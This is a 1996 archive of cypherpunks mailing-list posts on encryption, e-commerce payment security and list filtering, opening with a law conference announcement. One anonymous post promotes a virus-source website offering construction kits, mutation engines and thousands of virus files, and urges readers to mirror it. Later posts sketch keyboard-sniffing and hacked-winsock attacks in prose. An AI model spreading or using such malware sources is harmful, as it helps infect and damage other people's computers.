Date: Thu, 1 Feb 1996 04:43:12 +0800
To: cyberia-l@warthog.cc.wm.edu
Subject: Afternoon Conference: UCC 2B: Information Contracts - Correction
Message-ID: <1.5.4b11.16.19960131200227.59971eee@andromeda.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excuse x-posting.  Please forward to appropriate lists.

-----------------------------------------------------------------------

February 14 -- 1:30-4:30 PM -- UCC Article 2B: Information Contracts 


Rutgers School of Law-Newark and the New Jersey State Bar Association will
co-sponsor a program to introduce lawyers, business, and others to the
current draft of new Article 2B of the Uniform Commercial Code, Digital
Electronic Information and its Transfer. Professor Raymond T. Nimmer,
University of Houston and the Uniform Laws Commission Drafting Committee
Reporter, and two members of the Committee, Professor David A. Rice of
Rutgers School of Law-Newark and Professor Amy Boss of Temple University
School of Law, will present the draft, seek comments, and respond to
questions. Other panelists include Donald Cohn, Esq. of DuPont Corporation,
Co-Chair of the ABA Software Contract Law Task Force and Holly Towle, Esq.
of the Seattle law firm of Preston Gates & Ellis. 

This program is free; however, there is limited seating available. Please
call Assistant Dean Margaret C. Bridge at 201/648-5968 to reserve seating.

RELATED CONFERENCE: COPYRIGHT  ISSUES  AND  THE  NATIONAL  INFORMATION
INFRASTRUCTURE - February 15, 1996.  Please see the Conference home page at
URL:"http://www.rutgers.edu/RUSLN/copyconf.html".

-----------------------------------------------------------------------

February 14, 1996
                                                UCC 2B    
                                REGISTRATION  DEADLINE: February 10, 1996
                          (Walk-in registration permitted beginning at 8:30AM)

Number Attending: ________

Name(s)_____________________________________________________________________
________

Affiliation_________________________________________________________________
___________

Address _______________________________ City _________________  State _____
Zip _________

Telephone (_____)__________________


       Mail to:   Rutgers School of Law-Newark
                  15 Washington Street
                  Newark, NJ 07102-3192
            Attn: Assistant Dean Margaret C. Bridge


For further information, call Assistant Dean Margaret C. Bridge at (201)
648-5094, or send email to Professor David A. Rice at drice@world.std.com.
----------------------------------------------------------------------------
--------

**********||||||||||\\\\\\\\\\*//////////||||||||||**********
Steven C. Perkins              sperkins@andromeda.rutgers.edu
User Services Coordinator
Ackerson Law Library    http://www.rutgers.edu/lawschool.html
Rutgers, The State University of New Jersey,
School of Law at Newark 
                   http://www.rutgers.edu/RUSLN/rulnindx.html
              VOX: 201-648-5965 FAX: 201-648-1356                        
|||||||||||||||\\\\\\\\\\\\\||*||///////////////|||||||||||||||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 1 Feb 1996 08:50:32 +0800
To: Corey Minter <cminter@mipos2.intel.com>
Subject: Re: FYR_wal
In-Reply-To: <199601312123.QAA15096@zws388.sc.intel.com>
Message-ID: <Pine.SUN.3.91.960131150540.6873B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 31 Jan 1996, Corey Minter wrote:

> ok, who wants to help me market my new tunneling router software 
> called "Chinese Firedrill".  I believe it would sell well in China's
> black market.

Ah, how nice it would be to be among the barbarian hords that
breach the Great (Fire)Wall of China!


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Thu, 1 Feb 1996 08:43:41 +0800
To: cypherpunks@toad.com
Subject: Re: PZ a Nazi?
In-Reply-To: <m0thkcr-0000w9C@wittsend.com>
Message-ID: <Pine.HPP.3.91.960131151408.14097B-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain



just another smear campain from the control-freak left, lets let this 
thread die please :)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Thu, 1 Feb 1996 09:10:45 +0800
To: Corey Minter <mclow@owl.csusm.edu>
Subject: RE: [NOISE] Re: FYR_wal
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG960131154122OZ003800@red-01-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


perhaps it should, given that it will do about as well for its intended 
purpose...

Kurt

----------
From: 	Marshall Clow[SMTP:mclow@owl.csusm.edu]
Sent: 	Wednesday, January 31, 1996 14:58
To: 	Corey Minter
Cc: 	cypherpunks@toad.com
Subject: 	[NOISE] Re: FYR_wal

>ok, who wants to help me market my new tunneling router software
>called "Chinese Firedrill".  I believe it would sell well in China's
>black market.
>

Shouldn't it be called:
    "The Great Firewall of China"? ;-)


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"Eternal vigilance is the price of PostScript"
-- MacUser Jan 96 DTP and Graphics column








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Thu, 1 Feb 1996 04:12:54 +0800
To: cypherpunks@toad.com
Subject: Netscape encrypted email!!
Message-ID: <Pine.LNX.3.91.960131154058.8700A-100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain



>   * Integrated email - Netscape Navigator 2.0 offers full-featured and rich
>     email capabilities, allowing you to both read and send secure email
>     messages without launching an external email application.

I downloaded it and checked it out.  But it was not clear how to use this
secure email - so it may lack something yet in user friendlyness, or I may
have just missed it.  Anyway, it should be much easier to use than PGP. 
Are we all going to switch to Netscape for email?  Is anyone using this? 
Want to tell us how? 
 
   --  Vince


                     INTRODUCING NETSCAPE NAVIGATOR 2.0
----------------------------------------------------------------------------

END-USER FEATURES

   * Enhanced performance - New features such as client-side image mapping,
     Progressive JPEG support, and support for multiple simultaneous
     streaming of video, audio, and other data formats enhance the
     performance of Netscape Navigator 2.0.

   * Integrated email - Netscape Navigator 2.0 offers full-featured and rich
     email capabilities, allowing you to both read and send secure email
     messages without launching an external email application.

   * Integrated newsgroups - Sort, read, and post newsgroup messages in
     fully threaded hierarchical windows.

   * Security - New dynamic trust capability allows users to accept new
     certificate authorities. Other features include improved security user
     interface and protection against a site impersonating another site.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 1 Feb 1996 09:26:22 +0800
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: No FV supporters?
In-Reply-To: <Al3zxOeMc50eNT2K8w@nsb.fv.com>
Message-ID: <199601312351.PAA08243@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> instead choose to unleash their software as a live attack, First Virtual
> reserves the right to track them down to the best of its abilities and
> prosecute them to the full extent of the law.

	Ever heard of remailers, Nathaniel?

	That aside, I wasn't proposing a full fledged attack that
someone would actually use to commit fraud, just an attack which
would expose FV for the self-serving FUD-spreaders which they are.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Thu, 1 Feb 1996 09:26:36 +0800
To: Nathaniel Borenstein <jsw@netscape.com>
Subject: Flaw in FV process (was FV and Netscape slagging each other off :-)
Message-ID: <2.2.32.19960131235757.00d078d8@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:56 PM 1/31/96 -0500, Nathaniel Borenstein wrote about Jeffs attack:
>Your attack would be caught by us relatively quickly because our model
>is based not on a single fail-safe piece of security software, but on
>*process* security.  The overall process is multifaceted, with many
>checks and balances. 

Yes this is all fine and good - but your process does not allow for real time
delivery of goods.  For example:

Somebody wants to buy say micrsoft office from me for electronic delivery
(yes they have a lot of bandwidth :-).  I can authorize a credit card, fun
it by my fraud screen and start shipping in less than 30 seconds.    At this
point the transaction is done.

In the FV model as I understand it I'd have to ship the software and wait for 
an approve/deny/fraud from the user.  If it's anything but approved I'm SOL,
I still have to pay Microsoft for the product but I didn't get paid.

Solve that process flaw and I'll add FV support to software.net.

John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065
 "Technology is a way of organizing the universe so that man
  doesn't have to experience it." - Max Frisch





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com
Date: Thu, 1 Feb 1996 05:39:17 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Chomsky
In-Reply-To: <ad3506ce430210040bcb@[205.199.118.202]>
Message-ID: <199601312105.QAA27740@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> What's the big deal about mentioning Chomsky?

huh, chomsky is just another tentacle of tcmay anyway. isn't it funny how
he talks about "manufacturing consent" as though it were some great
overwhelming evil????  he is the one who manufactures consent among the
cypherpunks!! 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 1 Feb 1996 06:49:08 +0800
To: cypherpunks@toad.com
Subject: Crypto Cards
Message-ID: <2.2.32.19960131102440.00678e7c@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From 29 Jan edition of EE Times, P 24:

"Aix-en-Provence, France - A startup formed here to capitalize on the interest in cryptographic smart cards has won an assignment that could help put its name on the data-security map. The company, Inside Technologies, has been selectedby the Open Microprocessor Systems Initiative (OMI) to do the combo-chip layout for OMI's Cryptographic Reduced Instruction Set Processor (Crisp) project."
...
"'In public-key cryptography, 512-bit keys are typical and already vulnerable. So we are looking at 640-bit-long keys supported by a scalable design' said [IT partnet William Orme]. He said that conventional smart-card ICs tend to be based on available 8-bit microcontrollers and, sometimes, cryptographic processors.
Because it iss designed specifically for smart-card applications, the 8-bit RISC processor will require only 2,500 gates. Conventional crypto coprocessors tend to support only one type of algroithm, such as Rivest, Shamir, Adleman (RSA) or the Data Encryption Standard (DES).
Orme said that by designing the CLU at a lower level of granularity, multiplies and squaring operations, calculations can be built up in the form of building blocks and can support a variety of algroithms adn key lengths. 'Users want their own, custom algrotihms, which can be downloaded at the time of use', he said.
The CLU should support RSA, DES, and the Digital Signature Standard (DSS). RSA optimization will cover 320-, 512-, and 640-bit key lengths.
'The CLU will operate at a higher clock frequency than the RISC - 60 MHz, in our design - yielding 640-bit RSA decrypt in less than 50mS', Orme said."

Dave Merriman
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQ8mc8VrTvyYOzAZAQHa4wP+Ml3UAaywNzw+0OrN3iRfQ6y2DbjcDOs9
12Th32OGNJc5Ri0BPkI3n1+mlpZfIp9jQQI8B5gLI39nwkC9u0xnfmLFxHcSGsLB
/dynNagjOQ6/GhcZFs7XVMp0RJPYrmZ2QcmCZC5MF+V69+bTrGCMhN0+O1dPPneC
VB9x/klwdLk=
=yp0C
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@boston.CS.Berkeley.EDU (David A Wagner)
Date: Thu, 1 Feb 1996 06:20:25 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Borenstein's Fatal Spam
Message-ID: <199601312154.QAA13453@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <pgpmoose.199602010813.60849@paganini.sydney.sterling.com>,
Greg Rose <Greg_Rose@sydney.sterling.com> wrote:
> A number of people have written words to the
> effect of:
>   First Virtual, you lost a lot of ground with me.
>   (sounds like others feel the same way, too).
> 
> I disagree. I think there is a big difference
> between "knowing theoretically that X, Y and Z
> are possible" and "look, I have a program that
> does X, Y and Z in a certain order, and very
> fast, and surprisingly successfully, and this has
> major implications for the banking community".
     [...]
> I think most of the problem here is that we heard
> about it in media words first, and in a reasoned
> argument second. That's life. 

Ok.  Fair enough.  Good points.

Personally, what I found most distasteful about FV's post was their
conclusions, not their experimental procedure.

I agree that their keyboard-sniffer lends more evidence to the well-known
argument that, to make good use of crypto, you need secure endpoint machines.

I disagree when FV concludes that this makes crypto useless.  Instead, I'd
contend we just need to work to secure our endpoints better; then we can do
all sorts of neat stuff with crypto.

I found their conclusions to be academically displeasing.  But I guess
that's what happens when you're trying to sell a product...

- -- Dave Wagner

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQ/lHSoZzwIn1bdtAQG3bQF6AnSQY/3Hy6ha35vI5YrbyF8w7Xq/IcN9
IIwNqUKmrqlugKuduk0A9VqDG9Zi0Ksm
=7awQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Thu, 1 Feb 1996 10:06:05 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602010110.RAA21647@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


At 07:25 PM 1/30/96 -0800, Lucky Green wrote:

>>I take it its completely legal to set up a Virus ftp site then?
>
>AFIK, in the US it is legal to set up a virus ftp site. I don't know if
>someone has actually done it. Don't count on it lasting. Some European
>countries have already outlawed virus (read knowledge) distribution.

Anyone interested in visiting a good virus site should point their browsers to:

http://www.xcitement.com/virus/

Quite a good site, really.  It hasn't been "Netscape Enhanced" yet, so there
are no frames and tables and inline A/V, but it gets the job done.  They
offer a *lot* of virus source code (almost all of it in x86 assembler) and
many related resources.  Some highlights of the home page are included below.

I would recommend the use of something like WebWhacker, which automagically
downloads the contents of a web site to your local system and edits the html
files to work correctly from your local web browser.  It will allow you to
replicate the site quickly and easily, instead of clicking on each of the
more than 2500 links one at a time.

Hope this helps.  If you're interested, better get there quickly.  (Of
course, it's been up for six months now, so it's likely already withstood a
substantial amount of negative response.  It may be there to stay.)

---- 8< ----
        Welcome to the VIRUS Source Homepage!
        This page contains several virus code generators, a few mutation
engines, over 500 virus source files and over 2,100 executable virus files.
This material is being submitted for educational purposes only. Play at you
own risk. But have fun! 
        The purpose of this page is not to inflame, but to educate,
stimulate and confront you with alternative information on the sensitive
issue of virus creation and propagation. The only way in which to know the
whole of a subject, is by gaining knowledge from every variety of opinion on
the subject, and studying all modes in which it can be looked at. Inform
yourself by analyzing and studying the source code of actual viruses, read
the virus writing & assembly language tutorials. Then consider and examine
every variety of opinion on the subject; the anti-virus folks, mainstream
society, and most importantly ideas and opinions that are considered
radical, reactionary, minority or stigmatized by some other uncomplimentary
label. 
        No wise person ever acquired wisdom in any other way... 
        A special note to those of you who would like to see an end to this
page: If all humankind minus one were of one opinion, and only one person
were of the contrary opinion, humankind would be no more justified in
silencing that one person than it, if it had the power, would be justified
in silencing humankind... 

What's New?
        Last updated on 12/26/95.
Message Board
Code Generators
        The 2nd Generation in Virus Creation (46k) 
        Virus Creation Lab (164k) Password: Chiba City 
        Mass-Produced Code Generator (45k) 
        Instant Virus Production Kit (39k) 
        Trojan Horse Construction Kit (18k) 
        German Virus Construction Kit (12k) 
Mutation Engines
        Mutation Engine (13k) 
        Mutation Engine Tests (18k) 
        Polymorphic Engine (8k) 
        Visible Mutation Engine (20k) 
Source Code
        [A-Z]
Executable Files
        [A-Z]
Debug Scripts
        Over 33 debug script files (184k) 
Miscellanous
        Debug.com based interrupt stripper (3k) 
        V-86 based interrupt stripper (13k) 
        VSUMX507.ZIP (96k) - database of viruses. 
Assembly Language (resources)
Virus Writing Tutorials

---- 8< ----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: maher@gso.SAIC.COM (Kevin Maher)
Date: Thu, 1 Feb 1996 10:13:34 +0800
To: sjb@universe.digex.net (Scott Brickner)
Subject: Group ratings server (was Re: noise levels)
In-Reply-To: <199601312323.SAA05263@universe.digex.net>
Message-ID: <9602010118.AA14128@fjolsvid.gso.saic.com>
MIME-Version: 1.0
Content-Type: text


>I have an expansion on this.  Why not generalize the problem to create
>a group rating system?  

	I do this for myself.

	I hacked elm to accept, display, and update ratings from 0-9, keeping
the database in a very simple ascii file (internally it's a hash table).
	Then I have a script that converts the database into a procmail
program, so for me cypherpunks is seperated into cps (signal, rated 6-9)
cpu (unknown, rated 4-6 or no rating) and cpn (noise, rated 0-4).

>This is patterned after a newsgroup collaborative filtering tool I
>read a paper on not too long ago.  I can't find that reference, but
><URL:http://www-sloan.mit.edu/ccs/CCSWP165.html> has an open
>architecture design for a ratings server.

	This was an interesting project.  My favorite part was the idea 
that ratings from people you generally agreed with would be given greater
weight.  I don't know if they based this on comparing your ratings over 
a long list of messages, or simply looking up the average rating you 
gave their posts.

	I'd be interested in working on the other MUA and majordomo changes
you listed, if you're really interested in experimenting with this.

	Kevin

-- 
Kevin Maher          Software Engineer / General-Purpose Computer Geek
maher@gso.saic.com   Geophysical Systems Operation      
(619) 458-2167       Science Applications International Corp., San Diego




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Thu, 1 Feb 1996 10:54:33 +0800
To: stewarts@ix.netcom.com
Subject: Re: encrypted cellphones
In-Reply-To: <199601310810.AAA00261@ix10.ix.netcom.com>
Message-ID: <199602010122.RAA19810@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> Cellphones, of course, can only (usefully) use encryption if the
> cellular service provider uses it (i.e. if the end that's listening
> to your radio transmission can decode it :-)  American cell-phone 
> providers don't.  The GSM phones used in much of the world have encryption,
> but it's apparently not very strong.

Don't forget the more attractive option: End-to-end.  Why leave the
plaintext available for the cellular provider?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 2 Feb 1996 16:40:38 +0800
To: bryce@colorado.edu
Subject: Re: noise levels
In-Reply-To: <199601190051.RAA28314@nagina.cs.colorado.edu>
Message-ID: <199601312323.SAA05263@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Bryce writes:
>Perry, I quite agree with you.  I am having a very difficult
>time wading through cpunks, and I am currently reduced to
>grepping for my name, and then picking out a topic or two by
>subject line before junking 95% of the posts.  Since you have
>such enthusiasm for solving the noise problem I suggest that we
>do the following:
<auto-kill sublist scheme elided>

I have an expansion on this.  Why not generalize the problem to create
a group rating system?  Anyone who wants to can send ratings messages
(rating each message on a scale of one to five, one meaning "what total
crap" and five meaning "what a useful piece of information") to the
ratings server.  The server maintains the ratings for each message by
sender.  Client software can retrieve the ratings added since a
given time and use this information with the ratings assigned by the
user to generate compatibility profiles indicating with which raters
the user tends to agree, and provide ratings on all messages based on
it.  The user can then have anything lower than his tolerance threshold
automatically deleted.

This is patterned after a newsgroup collaborative filtering tool I
read a paper on not too long ago.  I can't find that reference, but
<URL:http://www-sloan.mit.edu/ccs/CCSWP165.html> has an open
architecture design for a ratings server.

Ideally, one would modify MUAs to recognize an "X-Ratings-To:" header
to tell where ratings messages should be sent, and the list server
would add that to all outgoing messages.  The MUA would present
the ratings buttons when displaying messages containing "X-Ratings-To:"
headers and automatically generate and send the rating when the user
pushed a button.

The beauty of this is that it works for *any* mailing list that has
an associated ratings server.  It allows anyone with the appropriate
MUA to ignore those conspiracypunks boneheads almost transparently.

Necessary coding:
    modifications to majordomo:
	- add optional ratings server address and update frequency in
	    list configuration data
	- add "X-Ratings-To:" headers to outgoing messages in lists with
	    ratings servers
	- periodically send ratings updates to ratings server subscribers
    modifications to MUAs:
	- recognize "X-Ratings-To:" headers in incoming messages and
	    present ratings interface when displaying them
	- generate ratings messages to ratings server
	- interpret incoming ratings messages to compute user's predicted
	    rating
	- maintain user preferences vector




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Fri, 2 Feb 1996 02:14:51 +0800
To: cypherpunks@toad.com
Subject: Re: new release of apache-ssl
In-Reply-To: <199601310936.BAA27103@infinity.c2.org>
Message-ID: <Pine.SOL.3.91.960131172511.4630A-100000@jaramillo.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 31 Jan 1996, sameer wrote:

> 	Apache-SSL 0.4.4 will soon be on the ftp site, and commercial
> licensees may request upgrades from apachessl@c2.org.

If someone put's this up on some European ftp site, please tell us. Right 
now only version 0.4.2 is available on utopia.hacktic.nl and ftp.funet.fi.

Juri Kaljundi, DigiMarket
jk@digit.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Thu, 1 Feb 1996 10:21:37 +0800
To: cypherpunks@toad.com
Subject: Re: noise levels
In-Reply-To: <199601312323.SAA05263@universe.digex.net>
Message-ID: <m2lomnn7y8.fsf@miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Scott" == Scott Brickner <sjb@universe.digex.net> writes:

Scott> I have an expansion on this.  Why not generalize the problem to create
Scott> a group rating system?

This has already been implemented in the Gnus Newsreader/Mail Agent
for Emacs.  Gnus uses an open-ended method for scoring articles, and
the score files may come from any place you can reach by ftp.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Thu, 1 Feb 1996 00:25:52 +0800
To: cypherpunks@toad.com
Subject: Re: encrypted cellphones
In-Reply-To: <199601310810.AAA00261@ix10.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.960131172957.4630D-100000@jaramillo.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 31 Jan 1996, Bill Stewart wrote:

> providers don't.  The GSM phones used in much of the world have encryption,
> but it's apparently not very strong.

GSM A5 security is supposed to have effective key length of 40 bits, 
although according to some sources 64-bit session key is used. The 
algorithms are not freely available, so you never know.

I would say GSM security is still better than nothing. The problem is of 
course that only tha radio link is encrypted, not the connection out into 
public telephone network.

Juri Kaljundi, DigiMarket
jk@digit.ee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Thu, 1 Feb 1996 15:47:43 +0800
To: cypherpunks@toad.com
Subject: re: More FUD
Message-ID: <960131174331.202083b0@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>The degree to which the attack you describe is a threat to online
>commerce depends critically on the degree to which viruses and Trojan
>horse programs can propagate through their potential base of platforms. 

Have to interject a comment: even real professionals (which virus writers
are not) have trouble getting software to work on on machine, let alone
all of the different platforms out there. Windows is worse (ever try to
write a .VXD - not easy). Take Michelangelo (please) is a member of a
class of viruses the is very difficult to detect: you have to read one
word at 0:414 from DOS to know something is wrong.

True, in early '92 when [Mich] came out things were more difficult - not
everyone had 640k in their machine so the user acurally had to have a clue
how much memory was supposed to be there. Today is there anyone with 512k ?

Detection has *always* been easy, it is removal that is difficult and
*automated* removal that is even more so - know what it takes to determine
that there is a macro that might be a virus in a WORD document ? One bit.
(Of course things are made a bit more difficult by the fact that MicroSoft
considers that bit's location or even its *existance* to be "proprietary"
and requires an NDA before they will discuss it - I refuse to sign it).

In recent months I have had all sorts of software blow up in Windows. 
On this machine alone (a 486DX-100 w 8 Mb of RAM & Win 3.1, 1 Mb SVGA
and nothing special), Reachout 5.0, FTP Onnet 2.0, QEMM 8.0 (Windows Manager),
and several name brand programs  have required massage to get to play 
together - and these are the programs from people I consider expert at what
they do, in fact each is IMNSHO the best in their class.

And you tell me that someone is going to spread a virus on the net that will
capture keystrokes on any machine it hits without anyone noticing ? It is 
to laugh (and if they can, they are wasting their time with credit card 
numbers).

(Did I mention that the documentation those signing the M$ NDA have been 
receiving has been *wrong* ?)

Not going to say you could not make one machine act that way - that is easy, 
not even going to say you won't make a number of machines act that way, but
spread with a virus enough will self-destruct on enough machines that 
intelligent people will get suspicious and some will react creatively.

Fact is that the greatest protection the net has is that no two machines are
alike, may even start that way but after six months, no way.

						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Feb 1996 09:37:38 +0800
To: cypherpunks@toad.com
Subject: [NOISE][CONTEST][FACTS] don't help much, do they?
Message-ID: <ad35484a000210046d7a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Ontogeny recapitulates phylogeny, as the saying goes.

I notice a recent surge in posts that have one or more of the bracketed
labels above, presumably in an effort to make the filtering job easier for
others.

However, this rarely works. For one thing, many of the most noisome posts,
in my estimation, lack the [NOISE] label. And many of the posts labelled
[NOISE] are actually pretty interesting, to me. Some people go overboard in
labelling their own stuff as [NOISE], out of some kind of false modesty.

And needless to say, the labels usually propagate into later followups.
(And, shockingly, some people even prepend the followups they make with the
[NOISE] label, thus screwing up threading.

I saw this fad for labelling over on the Extropians list. It failed then,
and will fail now.

For one thing, the labels take up valuable "namespace." It is far better
that the 30 to 50 characters of namespace be taken up with good,
descriptive thread titles.

Use labels if you must, but give some thought to how they just become more
roadside clutter, conveying no meaning.

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Thu, 1 Feb 1996 08:55:18 +0800
To: cypherpunks@toad.com
Subject: re: Netscape "secure E-Mail"
Message-ID: <960131175353.202083b0@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Vince rites:
>Anyway, it should be much easier to use than PGP. 

Can send PGP encrypted E-Mail from inside Netscape now - highlight/cut/punch 
Enclyptor "crypt" button/paste. This is difficult ? Read is same except
punch "Dec" and notepad pops up with cleartext. Have even read encrypted 
mail on the VAX with Telnet that way (no, Virginia, the cleartext does
not pass on the net).

>   * Integrated email - Netscape Navigator 2.0 offers full-featured and rich
>     email capabilities, allowing you to both read and send secure email
>     messages without launching an external email application.

Could do that now with a commerce server - didn't say "encrypted" email,
said "secure". Prolly just sends it to port 443 on the secure channel and
the server does the SMTP to the internal net.

						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Thu, 1 Feb 1996 08:51:38 +0800
To: Pete Loshin <jsw@netscape.com>
Subject: Flaw in Netscape rejoinder (was Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards)
In-Reply-To: <01BAEF34.AA95ECC0@ploshin.tiac.net>
Message-ID: <gl3zCVKMc50e1T2Rsa@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm way behind on my email, but someone suggested privately that I
should respond to Jeff's mail, so I've bumped it to the top of the queue:

Excerpts from mail.cypherpunks: 30-Jan-96 Re: No FV supporters? Jeff
Weinstein@netscape. (903*)

> I sent a description of an attack against FV based on replacing
> or hacking winsock to cypherpunks last night.  This attack seems
> to meet Borenstein's criteria of being as automated and implementable
> on a mass scale as their keyboard snooping attack.  So far I have not
> seen any response from FV.

Sorry for the delay.  I don't think your attack against FV works
anywhere nearly as well as our attack against software-encrypted credit
card numbers, as I'll explain below.

I should also apologize for the fact that I couldn't resist in pointing
out lots of little problems with your proposed attack, and that I'm
responding to your plan in the order you described it.  This means that
we don't get to the really major flaw in your strategy towards the end,
so what comes at first will seem like nitpicking.

Excerpts from mail.cypherpunks: 30-Jan-96 Re: FV Demonstrates Fatal F..
Jeff Weinstein@netscape. (2739*)

> It would not be much harder than the demonstrated keyboard attack
> to create a hacked version of winsock that would implement an
> attack against First Virtual.  If the attacker had a list of web
> pages that accept FV payments it would be very easy to collect
> the ID numbers.  

A list of stores?  First of all, this attack is already amazingly
focused.  Our DLL to implement the attack on credit cards is 16K, and
doesn't need to target any specific buyers, sellers, or programs.  The
more complex the attack & the bigger the software, the more likely it is
to be noticed.  But this is just a minor nit.  Read on.

> There is no need to attack the large datastream
> of keyboard input when the search can be easily narrowed.  Since
> FV doesn't use encryption the attack could easily be implemented
> in winsock, making it independent of any client software.  

What's really funny (to me, at least) here and in a lot of other aspects
of the cypherpunk reaction to FV is the continuing assumption that the
choice of FV vs encryption is an either/or thing.  Combine FV's Virtual
PIN mechanism with transport encryption and you've indiputably got
something that's a LOT safer than just using credit cards with
encryption, and a bit safer than our current system, too.  But I know,
the correct focus here is FV's current system.  So read on.

At this point in your attack, you skip a step:  You don't explain how
you correlate the FV ID to email address.  This means that your attack
will ONLY work for systems where the user is always using the same PC to
web browse and read his mail.  In practice, even if this is true 99% of
the time, the remaining 1% would probably cause your attack to be
detected pretty quickly if deployed on a large, automated scale.  But,
for the sake of argument, let's imagine that it's true 100% of the time.
 Read on.

> A version
> that infected the win95 IP stack could be quite effective.  The list
> of FV accepting sites would be easily obtainable via a query of
> altavista.  Since the infected system is on the internet and has
